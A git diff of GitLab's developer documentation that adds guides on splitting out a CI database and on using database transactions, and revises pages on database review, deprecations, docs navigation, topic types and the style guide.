@@ -0,0 +1,101 @@ +--- +stage: Enablement +group: Sharding +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Multiple Databases + +In order to scale GitLab, the GitLab application database +will be [decomposed into multiple +databases](https://gitlab.com/groups/gitlab-org/-/epics/6168). + +## CI Database + +Support for configuring the GitLab Rails application to use a distinct +database for CI tables was added in [GitLab +14.1](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64289). This +feature is still under development, and is not ready for production use. + +By default, GitLab is configured to use only one main database. To +opt-in to use a main database, and CI database, modify the +`config/database.yml` file to have a `main` and a `ci` database +configurations. For example, given a `config/database.yml` like below: + +```yaml +development: + adapter: postgresql + encoding: unicode + database: gitlabhq_development + host: /path/to/gdk/postgresql + pool: 10 + prepared_statements: false + variables: + statement_timeout: 120s + +test: &test + adapter: postgresql + encoding: unicode + database: gitlabhq_test + host: /path/to/gdk/postgresql + pool: 10 + prepared_statements: false + variables: + statement_timeout: 120s +``` + +Edit the `config/database.yml` to look like this: + +```yaml +development: + main: + adapter: postgresql + encoding: unicode + database: gitlabhq_development + host: /path/to/gdk/postgresql + pool: 10 + prepared_statements: false + variables: + statement_timeout: 120s + ci: + adapter: postgresql + encoding: unicode + database: gitlabhq_development_ci + migrations_paths: db/ci_migrate + host: /path/to/gdk/postgresql + pool: 10 + prepared_statements: false + variables: + statement_timeout: 120s + +test: &test + main: + adapter: postgresql + encoding: unicode + database: gitlabhq_test + host: /path/to/gdk/postgresql + pool: 10 + prepared_statements: false + variables: + statement_timeout: 120s + ci: + adapter: postgresql + encoding: unicode + database: gitlabhq_test_ci + migrations_paths: db/ci_migrate + host: /path/to/gdk/postgresql + pool: 10 + prepared_statements: false + variables: + statement_timeout: 120s +``` + +### Migrations + +Any migrations that affect `Ci::BaseModel` models +and their tables must be placed in two directories for now: + +- `db/migrate` +- `db/ci_migrate` + +We aim to keep the schema for both tables the same across both databases. diff --git a/doc/development/database/not_null_constraints.md b/doc/development/database/not_null_constraints.md index 9d1850f5504..48b198b46bd 100644 --- a/doc/development/database/not_null_constraints.md +++ b/doc/development/database/not_null_constraints.md @@ -175,7 +175,7 @@ class CleanupEpicsWithNullDescription < ActiveRecord::Migration[6.0] end ``` -#### Validate the text limit (next release) +#### Validate the `NOT NULL` constraint (next release) Validating the `NOT NULL` constraint will scan the whole table and make sure that each record is correct. @@ -201,7 +201,7 @@ end ## `NOT NULL` constraints on large tables -If you have to clean up a text column for a [high-traffic table](../migration_style_guide.md#high-traffic-tables) +If you have to clean up a nullable column for a [high-traffic table](../migration_style_guide.md#high-traffic-tables) (for example, the `artifacts` in `ci_builds`), your background migration will go on for a while and it will need an additional [background migration cleaning up](../background_migrations.md#cleaning-up) in the release after adding the data migration. diff --git a/doc/development/database/pagination_guidelines.md b/doc/development/database/pagination_guidelines.md index ce656851f86..b7209b4ca30 100644 --- a/doc/development/database/pagination_guidelines.md +++ b/doc/development/database/pagination_guidelines.md @@ -66,7 +66,7 @@ Offset-based pagination is the easiest way to paginate over records, however, it - Avoid using page numbers, use next and previous page buttons. - Keyset pagination doesn't support page numbers. - For APIs, advise against building URLs for the next page by "hand". - - Promote the usage of the [`Link` header](../../api/README.md#pagination-link-header) where the URLs for the next and previous page are provided by the backend. + - Promote the usage of the [`Link` header](../../api/index.md#pagination-link-header) where the URLs for the next and previous page are provided by the backend. - This way changing the URL structure is possible without breaking backward compatibility. NOTE: diff --git a/doc/development/database/pagination_performance_guidelines.md b/doc/development/database/pagination_performance_guidelines.md index ade1e853027..90e4faf2de7 100644 --- a/doc/development/database/pagination_performance_guidelines.md +++ b/doc/development/database/pagination_performance_guidelines.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w --- # Pagination performance guidelines - + The following document gives a few ideas for improving the pagination (sorting) performance. These apply both on [offset](pagination_guidelines.md#offset-pagination) and [keyset](pagination_guidelines.md#keyset-pagination) paginations. ## Tie-breaker column diff --git a/doc/development/database/rename_database_tables.md b/doc/development/database/rename_database_tables.md index 743558fae19..8ac50d2c0a0 100644 --- a/doc/development/database/rename_database_tables.md +++ b/doc/development/database/rename_database_tables.md @@ -81,7 +81,7 @@ Execute a standard migration (not a post-migration): when naming indexes, so there is a possibility that not all indexes are properly renamed. After running the migration locally, check if there are inconsistently named indexes (`db/structure.sql`). Those can be renamed manually in a separate migration, which can be also part of the release M.N+1. -- Foreign key columns might still contain the old table name. For smaller tables, follow our [standard column +- Foreign key columns might still contain the old table name. For smaller tables, follow our [standard column rename process](../avoiding_downtime_in_migrations.md#renaming-columns) - Avoid renaming database tables which are using with triggers. - Table modifications (add or remove columns) are not allowed during the rename process, please make sure that all changes to the table happen before the rename migration is started (or in the next release). diff --git a/doc/development/database/transaction_guidelines.md b/doc/development/database/transaction_guidelines.md new file mode 100644 index 00000000000..1c25496b153 --- /dev/null +++ b/doc/development/database/transaction_guidelines.md @@ -0,0 +1,117 @@ +--- +stage: Enablement +group: Database +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Transaction guidelines + +This document gives a few examples of the usage of database transactions in application code. + +For further reference please check PostgreSQL documentation about [transactions](https://www.postgresql.org/docs/current/tutorial-transactions.html). + +## Database decomposition and sharding + +The [sharding group](https://about.gitlab.com/handbook/engineering/development/enablement/sharding) plans to split the main GitLab database and move some of the database tables to other database servers. + +The group will start decomposing the `ci_*` related database tables first. To maintain the current application development experience, tooling and static analyzers will be added to the codebase to ensure correct data access and data modification methods. By using the correct form for defining database transactions, we can save significant refactoring work in the future. + +## The transaction block + +The `ActiveRecord` library provides a convenient way to group database statements into a transaction. + +```ruby +issue = Issue.find(10) +project = issue.project + +ApplicationRecord.transaction do + issue.update!(title: 'updated title') + project.update!(last_update_at: Time.now) +end +``` + +This transaction involves two database tables, in case of an error, each `UPDATE` statement will be rolled back to the previous, consistent state. + +NOTE: +Avoid referencing the `ActiveRecord::Base` class and use `ApplicationRecord` instead. + +## Transaction and database locks + +When a transaction block is opened, the database will try to acquire the necessary locks on the resources. The type of locks will depend on the actual database statements. + +Consider a concurrent update scenario where the following code is executed at the same time from two different processes: + +```ruby +issue = Issue.find(10) +project = issue.project + +ApplicationRecord.transaction do + issue.update!(title: 'updated title') + project.update!(last_update_at: Time.now) +end +``` + +The database will try to acquire the `FOR UPDATE` lock for the referenced `issue` and `project` records. In our case, we have two competing transactions for these locks, one of them will successfully acquire them. The other transaction will have to wait in the lock queue until the first transaction finishes. The execution of the second transaction is blocked at this point. + +## Transaction speed + +To prevent lock contention and maintain stable application performance, the transaction block should finish as fast as possible. When a transaction acquires locks, it will hold on to them until the transaction finishes. + +Apart from application performance, long-running transactions can also affect the application upgrade processes by blocking database migrations. + +### Dangerous example: 3rd party API calls + +Consider the following example: + +```ruby +member = Member.find(5) + +Member.transaction do + member.update!(notification_email_sent: true) + + member.send_notification_email +end +``` + +Here, we ensure that the `notification_email_sent` column is updated only when the `send_notification_email` method succeeds. The `send_notification_email` method executes a network request to an email sending service. If the underlying infrastructure does not specify timeouts or the network call takes too long time, the database transaction will stay open. + +Ideally, a transaction should only contain database statements. + +Avoid doing in a `transaction` block: + +- External network requests such as: triggering Sidekiq jobs, sending emails, HTTP API calls and running database statements using a different connection. +- File system operations. +- Long, CPU intensive computation. +- Calling `sleep(n)`. + +## Explicit model referencing + +If a transaction modifies records from the same database table, it's advised to use the `Model.transaction` block: + +```ruby +build_1 = Ci::Build.find(1) +build_2 = Ci::Build.find(2) + +Ci::Build.transaction do + build_1.touch + build_2.touch +end +``` + +The transaction above will use the same database connection for the transaction as the models in the `transaction` block. In a multi-database environment the following example would be dangerous: + +```ruby +# `ci_builds` table is located on another database +class Ci::Build < CiDatabase +end + +build_1 = Ci::Build.find(1) +build_2 = Ci::Build.find(2) + +ActiveRecord::Base.transaction do + build_1.touch + build_2.touch +end +``` + +The `ActiveRecord::Base` class uses a different database connection than the `Ci::Build` records. The two statements in the transaction block will not be part of the transaction and will not be rolled back in case something goes wrong. They act as 3rd part calls. diff --git a/doc/development/database_review.md b/doc/development/database_review.md index a25714ca6cf..88639758a9d 100644 --- a/doc/development/database_review.md +++ b/doc/development/database_review.md @@ -25,7 +25,7 @@ A database review is required for: generally up to the author of a merge request to decide whether or not complex queries are being introduced and if they require a database review. -- Changes in usage data metrics that use `count`, `distinct_count` and `estimate_batch_distinct_count`. +- Changes in Service Data metrics that use `count`, `distinct_count` and `estimate_batch_distinct_count`. These metrics could have complex queries over large tables. See the [Product Intelligence Guide](https://about.gitlab.com/handbook/product/product-intelligence-guide/) for implementation details. @@ -43,7 +43,7 @@ If your merge request description does not include these items, the review will If new migrations are introduced, in the MR **you are required to provide**: -- The output of both migrating and rolling back for all migrations +- The output of both migrating (`db:migrate`) and rolling back (`db:rollback`) for all migrations. If new queries have been introduced or existing queries have been updated, **you are required to provide**: @@ -104,7 +104,7 @@ the following preparations into account. `db/schema_migrations` were added or removed. - Make migrations reversible by using the `change` method or include a `down` method when using `up`. - Include either a rollback procedure or describe how to rollback changes. -- Add the output of both migrating and rolling back for all migrations into the MR description. +- Add the output of both migrating (`db:migrate`) and rolling back (`db:rollback`) for all migrations into the MR description. - Ensure the down method reverts the changes in `db/structure.sql`. - Update the migration output whenever you modify the migrations during the review process. - Add tests for the migration in `spec/migrations` if necessary. See [Testing Rails migrations at GitLab](testing_guide/testing_migrations_guide.md) for more details. @@ -117,6 +117,9 @@ test its execution using `CREATE INDEX CONCURRENTLY` in the `#database-lab` Slac - If the execution from `#database-lab` is longer than `1h`, the index should be moved to a [post-migration](post_deployment_migrations.md). Keep in mind that in this case you may need to split the migration and the application changes in separate releases to ensure the index will be in place when the code that needs it will be deployed. +- Trigger the [database testing](../architecture/blueprints/database_testing/index.md) job (`db:gitlabcom-database-testing`) in the `test` stage. + - This job runs migrations in a production-like environment (similar to `#database_lab`) and posts to the MR its findings (queries, runtime, size change). + - Review migration runtimes and any warnings. #### Preparation when adding or modifying queries @@ -148,7 +151,7 @@ test its execution using `CREATE INDEX CONCURRENTLY` in the `#database-lab` Slac - Provide a public link to the plan from either: - [postgres.ai](https://postgres.ai/): Follow the link in `#database-lab` and generate a shareable, public link by clicking the **Share** button in the upper right corner. - - [explain.depesz.com](https://explain.depesz.com): Paste both the plan and the query used in the form. + - [explain.depesz.com](https://explain.depesz.com) or [explain.dalibo.com](https://explain.dalibo.com): Paste both the plan and the query used in the form. - When providing query plans, make sure it hits enough data: - You can use a GitLab production replica to test your queries on a large scale, through the `#database-lab` Slack channel or through [ChatOps](understanding_explain_plans.md#chatops). diff --git a/doc/development/deprecation_guidelines/index.md b/doc/development/deprecation_guidelines/index.md index 07a29b17ddc..3543345aa34 100644 --- a/doc/development/deprecation_guidelines/index.md +++ b/doc/development/deprecation_guidelines/index.md @@ -14,8 +14,7 @@ changes to GitLab features. It's important to understand the difference between **deprecation** and **removal**: -**Deprecation** is the process of flagging/marking/announcing that a feature -is scheduled for removal in a future version of GitLab. +**Deprecation** is the process of flagging/marking/announcing that a feature is no longer fully supported and may be removed in a future version of GitLab. **Removal** is the process of actually removing a feature that was previously deprecated. @@ -31,7 +30,7 @@ Deprecations should be announced via [release posts](https://about.gitlab.com/ha Generally, feature or configuration can be removed/changed only on major release. It also should be [deprecated in advance](https://about.gitlab.com/handbook/marketing/blog/release-posts/#deprecations). -For API removals, see the [GraphQL](../../api/graphql/index.md#deprecation-and-removal-process) and [GitLab API](../../api/README.md#compatibility-guidelines) guidelines. +For API removals, see the [GraphQL](../../api/graphql/index.md#deprecation-and-removal-process) and [GitLab API](../../api/index.md#compatibility-guidelines) guidelines. For configuration removals, see the [Omnibus deprecation policy](https://docs.gitlab.com/omnibus/package-information/deprecation_policy.html). diff --git a/doc/development/documentation/index.md b/doc/development/documentation/index.md index 12a1912dd25..91215ca21b4 100644 --- a/doc/development/documentation/index.md +++ b/doc/development/documentation/index.md @@ -115,15 +115,15 @@ each page should have a metadata tag called `type`. It can be one or more of the following: - `index`: It consists mostly of a list of links to other pages. - [Example page](../../README.md). + [Example page](../../index.md). - `concepts`: The background or context of a subject. [Example page](../../topics/autodevops/index.md). - `howto`: Specific use case instructions. - [Example page](../../ssh/README.md). + [Example page](../../ssh/index.md). - `tutorial`: Learn a process/concept by doing. [Example page](../../gitlab-basics/start-using-git.md). - `reference`: A collection of information used as a reference to use a feature - or a functionality. [Example page](../../ci/yaml/README.md). + or a functionality. [Example page](../../ci/yaml/index.md). ### Redirection metadata @@ -395,7 +395,7 @@ This is preferred over static paths, as the helper also works on instances insta ### GitLab `/help` tests Several [RSpec tests](https://gitlab.com/gitlab-org/gitlab/-/blob/master/spec/features/help_pages_spec.rb) -are run to ensure GitLab documentation renders and works correctly. In particular, that [main docs landing page](../../README.md) works correctly from `/help`. +are run to ensure GitLab documentation renders and works correctly. In particular, that [main docs landing page](../../index.md) works correctly from `/help`. For example, [GitLab.com's `/help`](https://gitlab.com/help). ## Docs site architecture @@ -475,12 +475,12 @@ If you want to know the in-depth details, here's what's really happening: The following GitLab features are used among others: -- [Manual actions](../../ci/yaml/README.md#whenmanual) -- [Multi project pipelines](../../ci/multi_project_pipelines.md) +- [Manual actions](../../ci/yaml/index.md#whenmanual) +- [Multi project pipelines](../../ci/pipelines/multi_project_pipelines.md) - [Review Apps](../../ci/review_apps/index.md) -- [Artifacts](../../ci/yaml/README.md#artifacts) +- [Artifacts](../../ci/yaml/index.md#artifacts) - [Specific runner](../../ci/runners/runners_scope.md#prevent-a-specific-runner-from-being-enabled-for-other-projects) -- [Pipelines for merge requests](../../ci/merge_request_pipelines/index.md) +- [Pipelines for merge requests](../../ci/pipelines/merge_request_pipelines.md) ## Testing @@ -556,6 +556,3 @@ padding. The padding is added around the element, enlarging the screenshot area. #### Live example Please use `spec/docs_screenshots/container_registry_docs.rb` as a guide and as an example to create your own scripts. - -<!-- This redirect file can be deleted after February 1, 2021. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/documentation/site_architecture/global_nav.md b/doc/development/documentation/site_architecture/global_nav.md index aeaf12e23d1..3845586ce60 100644 --- a/doc/development/documentation/site_architecture/global_nav.md +++ b/doc/development/documentation/site_architecture/global_nav.md @@ -12,21 +12,40 @@ description: "Learn how GitLab docs' global navigation works and how to add new > - [Per-project](https://gitlab.com/gitlab-org/gitlab-docs/-/merge_requests/498) navigation added in GitLab 12.2. > - [Unified global navigation](https://gitlab.com/gitlab-org/gitlab-docs/-/merge_requests/1482) added in GitLab 13.11. -Global navigation (the left-most pane in our three pane documentation) provides: +Global navigation is the left-most pane in the documentation. You can use the +"global nav" to browse the content. -- A high-level grouped view of product features. -- The ability to discover new features by browsing the menu structure. -- A way to allow the reader to focus on product areas. -- The ability to refine landing pages, so they don't have to do all the work of surfacing - every page contained within the documentation. +Research shows that people use Google to search for GitLab product documentation. When they land on a result, +we want them to find topics nearby that are related to the content they're reading. The global nav provides this information. -## Adding new items +At the highest level, our global nav is workflow-based. Navigation needs to help users build a mental model of how to use GitLab. +The levels under each of the higher workflow-based topics are the names of features. +For example: + +**Use GitLab** (_workflow_) **> Build your application** (_workflow_) **> CI/CD** (_feature_) **> Pipelines** (_feature) + +## Choose the right words for your navigation entry + +Before you add an item to the left nav, choose the parts of speech you want to use. + +The nav entry should match the page title. However, if the title is too long, +when you shorten the phrase, use either: + +- A noun, like **Merge requests**. +- An active verb, like **Install GitLab** or **Get started with runners**. + +Use a phrase that clearly indicates what the page is for. For example, **Get started** is not +as helpful as **Get started with runners**. + +## Add a navigation entry + +All topics should be included in the left nav. To add a topic to the global nav, edit [`navigation.yaml`](https://gitlab.com/gitlab-org/gitlab-docs/blob/main/content/_data/navigation.yaml) and add your item. -All new pages need a new navigation item. Without a navigation, the page becomes "orphaned". That +All new pages need a navigation item. Without a navigation, the page becomes "orphaned." That is: - The navigation shuts when the page is opened, and the reader loses their place. @@ -93,7 +112,7 @@ for clarity. To see the improvements planned, check the [global nav epic](https://gitlab.com/groups/gitlab-org/-/epics/1599). -**Do not** [add items](#adding-new-items) to the global nav without +**Do not** [add items](#add-a-navigation-entry) to the global nav without the consent of one of the technical writers. ## Composition diff --git a/doc/development/documentation/site_architecture/index.md b/doc/development/documentation/site_architecture/index.md index d410d77a1a0..a1e08a9c19b 100644 --- a/doc/development/documentation/site_architecture/index.md +++ b/doc/development/documentation/site_architecture/index.md @@ -8,7 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w The [`gitlab-docs`](https://gitlab.com/gitlab-org/gitlab-docs) project hosts the repository which is used to generate the GitLab documentation website and -is deployed to <https://docs.gitlab.com>. It uses the [Nanoc](https://nanoc.ws/) +is deployed to <https://docs.gitlab.com>. It uses the [Nanoc](https://nanoc.app/) static site generator. ## Architecture @@ -146,7 +146,7 @@ Read more about the [deployment process](deployment_process.md). The easiest way to achieve something similar to [Jekyll's data files](https://jekyllrb.com/docs/datafiles/) in Nanoc is by -using the [`@items`](https://nanoc.ws/doc/reference/variables/#items-and-layouts) +using the [`@items`](https://nanoc.app/doc/reference/variables/#items-and-layouts) variable. The data file must be placed inside the `content/` directory and then it can diff --git a/doc/development/documentation/structure.md b/doc/development/documentation/structure.md index 871fb26ce08..ac934673ee2 100644 --- a/doc/development/documentation/structure.md +++ b/doc/development/documentation/structure.md @@ -7,61 +7,40 @@ description: What to include in GitLab documentation pages. # Documentation topic types -At GitLab, we have not traditionally used topic types. However, we are starting to -move in this direction, and we now use four topic types: +At GitLab, we have not traditionally used types for our content. However, we are starting to +move in this direction, and we now use four primary topic types: - [Concept](#concept) - [Task](#task) - [Reference](#reference) - [Troubleshooting](#troubleshooting) -Each page contains multiple topic types. For example, -a page with the title `Pipelines`, which is generated from a file called `index.md`, -can include a concept and multiple task and reference topics. +In general, each page in our docset contains multiple topics. (Each heading indicates a new topic.) +Each topic on a page should be a specific topic type. For example, +a page with the title `Pipelines` can include topics that are concepts and tasks. -GitLab also uses high-level landing pages. - -## Landing pages - -Landing pages are topics that group other topics and help a user to navigate a section. - -Users who are using the in-product help do not have a left nav, -and need these topics to navigate the documentation. - -These topics can also help other users find the most important topics -in a section. - -Landing page topics should be in this format: - -```markdown -# Title (a noun, like "CI/CD or "Analytics") - -Brief introduction to the concept or product area. -Include the reason why someone would use this thing. - -- Bulleted list of important related topics. -- These links are needed because users of in-product help do not have left navigation. -``` +A page might also contain only one type of information. These pages are generally one of our +[other content types](#other-types-of-content). ## Concept -A concept topic introduces a single feature or concept. +A concept introduces a single feature or concept. A concept should answer the questions: - What is this? - Why would I use it? -Think of everything someone might want to know if they've never heard of this topic before. +Think of everything someone might want to know if they've never heard of this concept before. Don't tell them **how** to do this thing. Tell them **what it is**. -If you start describing another topic, start a new concept and link to it. +If you start describing another concept, start a new concept and link to it. -Also, do not use "Overview" or "Introduction" for the topic title. Instead, +Also, do not use **Overview** or **Introduction** for the title. Instead, use a noun or phrase that someone would search for. -Concept topics should be in this format: +Concepts should be in this format: ```markdown # Title (a noun, like "Widgets") @@ -71,14 +50,14 @@ A paragraph that explains what this thing is. Another paragraph that explains what this thing is. Remember, if you start to describe about another concept, stop yourself. -Each concept topic should be about one concept only. +Each concept should be about one concept only. ``` ## Task -A task topic gives instructions for how to complete a procedure. +A task gives instructions for how to complete a procedure. -Task topics should be in this format: +Tasks should be in this format: ```markdown # Title (starts with an active verb, like "Create a widget" or "Delete a widget") @@ -113,20 +92,21 @@ Prerequisites: To create an issue: -1. Go to **Issues > List**. -1. In the top right, select **New issue**. -1. Complete the fields. (If you have a reference topic that lists each field, link to it here.) +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Issues > List**. +1. In the top right corner, select **New issue**. +1. Complete the fields. (If you have reference content that lists each field, link to it here.) 1. Select **Create issue**. The issue is created. You can view it by going to **Issues > List**. ``` -If you have several tasks on a page that share prerequisites, you can make a -reference topic with the title **Prerequisites**, and link to it. +If you have several tasks on a page that share prerequisites, you can use the title +**Prerequisites**, and link to it. ## Reference -A reference topic provides information in an easily-scannable format, +Reference information should be in an easily-scannable format, like a table or list. It's similar to a dictionary or encyclopedia entry. ```markdown @@ -139,18 +119,18 @@ Introductory sentence. | **Name** | Descriptive sentence about the setting. | ``` -If a feature or concept has its own prerequisites, you can use the reference -topic type to create a **Prerequisites** header for the information. +If a feature or concept has its own prerequisites, you can use reference +content to create a **Prerequisites** header for the information. ## Troubleshooting -Troubleshooting topics can be one of two categories: +Troubleshooting can be one of two categories: -- **Troubleshooting task.** This topic is written the same as a [standard task topic](#task). +- **Troubleshooting task.** This information is written the same way as a [standard task](#task). For example, "Run debug tools" or "Verify syntax." -- **Troubleshooting reference.** This topic has a specific format. +- **Troubleshooting reference.** This information has a specific format. -Troubleshooting reference topics should be in this format: +Troubleshooting reference information should be in this format: ```markdown # Title (the error message or a description of it) @@ -162,25 +142,125 @@ This issue occurs when... The workaround is... ``` -For the topic title: +For the heading: -- Consider including at least a partial error message in the title. +- Consider including at least a partial error message. - Use fewer than 70 characters. -Remember to include the complete error message in the topics content if it is -not complete in the title. +If you do not put the full error in the title, include it in the body text. + +## Other types of content + +There are other types of content in the GitLab documentation that don't +classify as one of the four primary [topic types](#documentation-topic-types). +These include: + +- [Tutorials](#tutorials) +- [Get started pages](#get-started) +- [Topics and resources pages](#topics-and-resources-pages) + +In most cases, these pages are standalone. + +### Tutorials + +A tutorial is an end-to-end walkthrough of a complex workflow or scenario. +In general, you might consider using a tutorial when: + +- The workflow requires a number of sequential steps where each step consists + of sub-steps. +- The steps cover a variety of GitLab features or third-party tools. + +Tutorials are learning aids that complement our core documentation. +They do not introduce new features. +Always use the primary [topic types](#documentation-topic-types) to document new features. + +Tutorials should be in this format: + +```markdown +# Title (starts with "Tutorial:" followed by an active verb, like "Tutorial: Create a website") + +A paragraph that explains what the tutorial does, and the expected outcome. + +To create a website: + +- [Step 1: Do the first task](#do-the-first-task) +- [Step 2: Do the second task](#do-the-second-task) + +Prerequisites (optional): + +- Thing 1 +- Thing 2 +- Thing 3 + +## Do the first task + +To do step 1: + +1. First step. +2. Another step. +3. Another step. + +## Do the second task + +Before you begin, make sure you have [done the first task](#do-the-first-task). + +To do step 2: + +1. First step. +2. Another step. +3. Another step. +``` + +### Get started + +A get started page is a set of steps to help a user get set up +quickly to use a single GitLab feature or tool. +It might consist of more than one task. + +Get started pages should be in this format: + +```markdown +# Title ("Get started with <feature>") + +Complete the following steps to ... . + +1. First step. +1. Another step. +1. Another step. + +If you need to add more than one task, +consider using subsections for each distinct task. +``` -## Other information on a topic +### Topics and resources pages -Topics include other information. +This is a page with a list of links that point to important sections +of documentation for a specific GitLab feature or tool. -For example: +We do not encourage the use of these types of pages. +Lists like this can get out of date quickly and offer little value to users. +We've included this type here because: -- Each topic must have a [tier badge](styleguide/index.md#product-tier-badges). -- New topics must have information about the - [GitLab version where the feature was introduced](styleguide/index.md#where-to-put-version-text). +- There are existing pages in the documentation that follow this format, + and they should be standardized. +- They can sometimes help navigate a complex section of the documentation. + +If you come across a page like this +or you have to create one, use this format: + +```markdown +# Title ("Topics and resources for <feature>") + +Brief sentence to describe the feature. + +Refer to these resources for more information about <this feature>: + +- Link 1 +- Link 2 +- Link 3 +``` -### Help and feedback section +## Help and feedback section This section ([introduced](https://gitlab.com/gitlab-org/gitlab-docs/-/merge_requests/319) in GitLab 11.4) is displayed at the end of each document and can be omitted by adding a key into @@ -195,7 +275,7 @@ feedback: false The default is to leave it there. If you want to omit it from a document, you must check with a technical writer before doing so. -#### Disqus +### Disqus We also have integrated the docs site with Disqus (introduced by [!151](https://gitlab.com/gitlab-org/gitlab-docs/-/merge_requests/151)), @@ -210,7 +290,7 @@ comments: false --- ``` -We're hiding comments only in main index pages, such as [the main documentation index](../../README.md), +We're hiding comments only in main index pages, such as [the main documentation index](../../index.md), since its content is too broad to comment on. Before omitting Disqus, you must check with a technical writer. @@ -221,7 +301,7 @@ The click events in the feedback section are tracked with Google Tag Manager. The conversions can be viewed on Google Analytics by navigating to **Behavior > Events > Top events > docs**. -### Guidelines for good practices +## Guidelines for good practices > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/36576/) in GitLab 13.2 as GitLab Development documentation. diff --git a/doc/development/documentation/styleguide/index.md b/doc/development/documentation/styleguide/index.md index 7787366dbf4..a5345f3b52d 100644 --- a/doc/development/documentation/styleguide/index.md +++ b/doc/development/documentation/styleguide/index.md @@ -193,7 +193,7 @@ included in backticks. For example: We include concept and task topic types in the same larger topic. -In general, we have one topic that's a [landing page](../structure.md#landing-pages). +In general, we have one topic that's a landing page. Below that topic in the left nav are individual topics. Each of these include a concept and multiple related tasks, reference, and troubleshooting topics. @@ -304,7 +304,6 @@ GitLab documentation should be clear and easy to understand. Avoid unnecessary w - Be clear, concise, and stick to the goal of the topic. - Write in US English with US grammar. (Tested in [`British.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/British.yml).) -- Use [inclusive language](#inclusive-language). - Rewrite to avoid wordiness: - there is - there are @@ -385,80 +384,6 @@ references to user interface elements. For example: - To sign in to product X, enter your credentials, and then select **Log in**. -### Inclusive language - -We strive to create documentation that's inclusive. This section includes -guidance and examples for these categories: - -- [Gender-specific wording](#avoid-gender-specific-wording). - (Tested in [`InclusionGender.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionGender.yml).) -- [Ableist language](#avoid-ableist-language). - (Tested in [`InclusionAbleism.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionAbleism.yml).) -- [Cultural sensitivity](#culturally-sensitive-language). - (Tested in [`InclusionCultural.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionCultural.yml).) - -We write our developer documentation with inclusivity and diversity in mind. This -page is not an exhaustive reference, but describes some general guidelines and -examples that illustrate some best practices to follow. - -#### Avoid gender-specific wording - -When possible, use gender-neutral pronouns. For example, you can use a singular -[they](https://developers.google.com/style/pronouns#gender-neutral-pronouns) as -a gender-neutral pronoun. - -Avoid the use of gender-specific pronouns, unless referring to a specific person. - -<!-- vale gitlab.InclusionGender = NO --> - -| Use | Avoid | -|-----------------------------------|---------------------------------| -| People, humanity | Mankind | -| GitLab Team Members | Manpower | -| You can install; They can install | He can install; She can install | - -<!-- vale gitlab.InclusionGender = YES --> - -If you need to set up [Fake user information](#fake-user-information), use -diverse or non-gendered names with common surnames. - -#### Avoid ableist language - -Avoid terms that are also used in negative stereotypes for different groups. - -<!-- vale gitlab.InclusionAbleism = NO --> - -| Use | Avoid | -|------------------------|----------------------| -| Check for completeness | Sanity check | -| Uncertain outliers | Crazy outliers | -| Slows the service | Cripples the service | -| Placeholder variable | Dummy variable | -| Active/Inactive | Enabled/Disabled | -| On/Off | Enabled/Disabled | - -<!-- vale gitlab.InclusionAbleism = YES --> - -Credit: [Avoid ableist language](https://developers.google.com/style/inclusive-documentation#ableist-language) -in the Google Developer Style Guide. - -#### Culturally sensitive language - -Avoid terms that reflect negative cultural stereotypes and history. In most -cases, you can replace terms such as `master` and `slave` with terms that are -more precise and functional, such as `primary` and `secondary`. - -<!-- vale gitlab.InclusionCultural = NO --> - -| Use | Avoid | -|----------------------|-----------------------| -| Primary / secondary | Master / slave | -| Allowlist / denylist | Blacklist / whitelist | - -<!-- vale gitlab.InclusionCultural = YES --> - -For more information see the [Internet Draft specification](https://tools.ietf.org/html/draft-knodel-terminology-02). - ### Fake user information You may need to include user information in entries such as a REST call or user profile. @@ -574,7 +499,7 @@ Follow these guidelines for punctuation: | Do not use tabs for indentation. Use spaces instead. You can configure your code editor to output spaces instead of tabs when pressing the tab key. | --- | | Use serial commas (_Oxford commas_) before the final _and_ or _or_ in a list of three or more items. (Tested in [`OxfordComma.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/OxfordComma.yml).) | _You can create new issues, merge requests, and milestones._ | | Always add a space before and after dashes when using it in a sentence (for replacing a comma, for example). | _You should try this - or not._ | -| Always use lowercase after a colon. | Linked issues: a way to create a relationship between issues._ | +| When a colon is part of a sentence, always use lowercase after the colon. | _Linked issues: a way to create a relationship between issues._ | <!-- vale gitlab.Repetition = YES --> @@ -812,6 +737,35 @@ page), use these phrases: | No | `**{dotted-circle}** No` | **{dotted-circle}** No | | Yes | `**{check-circle}** Yes` | **{check-circle}** Yes | +### Footnotes + +To indicate a footnote, use the HTML tag `<sup>` with a number. +Put the tag at the end of the sentence or term. + +For the footnotes below the table, use a bold number followed by a sentence. + +For example: + +```markdown +| App name | Description | +|:---------|:---------------------------------| +| App A | Description text. <sup>1</sup> | +| App B | Description text. <sup>2</sup> | + +1. This is the footnote. +1. This is the other footnote. +``` + +This text renders this output: + +| App name | Description | +|:---------|:---------------------------------| +| App A | Description text. <sup>1</sup> | +| App B | Description text. <sup>2</sup> | + +1. This is the footnote. +1. This is the other footnote. + ## Quotes Valid for Markdown content only, not for front matter entries: @@ -1093,21 +1047,23 @@ elements: To be consistent, use this format when you write about UI navigation. -1. On the top bar, select **Menu > Project** and find your project. +1. On the top bar, select **Menu > Projects** and find your project. 1. On the left sidebar, select **Settings > CI/CD**. 1. Expand **General pipelines**. Another example: -1. On the top bar, select **Menu > Group** and find your group. +1. On the top bar, select **Menu > Groups** and find your group. 1. On the left sidebar, select **Settings > CI/CD**. 1. Expand **General pipelines**. An Admin Area example: -`1. On the top bar, select **Menu >** **{admin}** **Admin**.` +```markdown +1. On the top bar, select **Menu >** **{admin}** **Admin**. +``` -This text generates this HTML: +This text renders this output: 1. On the 